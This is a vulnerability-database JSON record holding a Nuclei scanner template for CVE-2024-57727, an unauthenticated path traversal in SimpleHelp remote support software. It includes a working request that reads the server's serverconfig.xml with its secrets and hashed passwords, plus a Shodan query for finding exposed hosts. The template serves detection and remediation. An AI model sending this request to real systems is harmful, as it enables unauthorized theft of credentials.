{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-57727/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-57727/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-57727/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-57727/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-57727/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-57727"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-57727"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2024/CVE-2024-57727.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2024-57727\n\ninfo:\n  name: SimpleHelp <= 5.5.7 - Unauthenticated Path Traversal\n  author: iamnoooob,rootxharsh,pdresearch,3th1cyuk1\n  severity: high\n  description: |\n    SimpleHelp remote support software v5.5.7 and before is vulnerable to multiple path traversal vulnerabilities that enable unauthenticated remote attackers to download arbitrary files from the SimpleHelp host via crafted HTTP requests. These files include server configuration files containing various secrets and hashed user passwords.\n  impact: |\n    Unauthenticated attackers can exploit path traversal to download server configuration files containing secrets, hashed passwords, and other sensitive information.\n  remediation: |\n    Update SimpleHelp to version 5.5.8 or later to address the path traversal vulnerabilities.\n  reference:\n    - https://simple-help.com/kb---security-vulnerabilities-01-2025#security-vulnerabilities-in-simplehelp-5-5-7-and-earlier\n    - https://www.horizon3.ai/attack-research/disclosures/critical-vulnerabilities-in-simplehelp-remote-support-software/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2024-57727\n    cwe-id: CWE-22\n    epss-score: 0.95151\n    epss-percentile: 0.99862\n    cpe: cpe:2.3:a:simple-help:simplehelp:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: simple-help\n    product: simplehelp\n    shodan-query: html:\"SimpleHelp\"\n  tags: cve,cve2024,simplehelp,lfi,kev,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /toolbox-resource/../serverconfig.xml HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '<SimpleSuite'\n          - '<HashPassword>'\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - 'application/octet-stream'\n# digest: 490a00463044022030977b4bcf230829bfb80d7fcf811e98316d8d0e3fa6c591c37dbe5a7851a2af022026d0899c691d2190f92e2d8b3b9d484b9c647340460ff1c354b4e25d53fda577:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2024-57727"
}